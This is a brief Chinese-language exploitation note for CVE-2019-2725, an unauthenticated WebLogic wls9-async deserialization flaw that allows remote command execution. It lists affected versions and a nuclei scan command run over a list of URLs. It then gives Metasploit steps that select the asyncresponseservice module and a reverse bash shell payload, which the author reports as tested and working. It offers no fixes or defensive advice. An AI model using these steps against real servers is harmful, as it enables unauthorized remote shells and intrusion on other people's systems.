[CVE 2019 2725] wls反序列化

漏洞概述¶

WebLogic wls9-async反序列化远程命令执行漏洞

攻击者利用该漏洞，可在未授权的情况下远程执行命令

Weblogic 12.1.3.0.0
Weblogic 12.2.1.3.0
Weblogic 12.2.1.4.0

nuclei -tags weblogic -t cves/ -l urls.txt

use multi/misc/weblogic_deserialize_asyncresponseservice
set payload cmd/unix/reverse_bash   #target->unix,这个payload实测成功

这个模块也适用于Weblogic XMLdecoder反序列化漏洞 (CVE-2017-10271)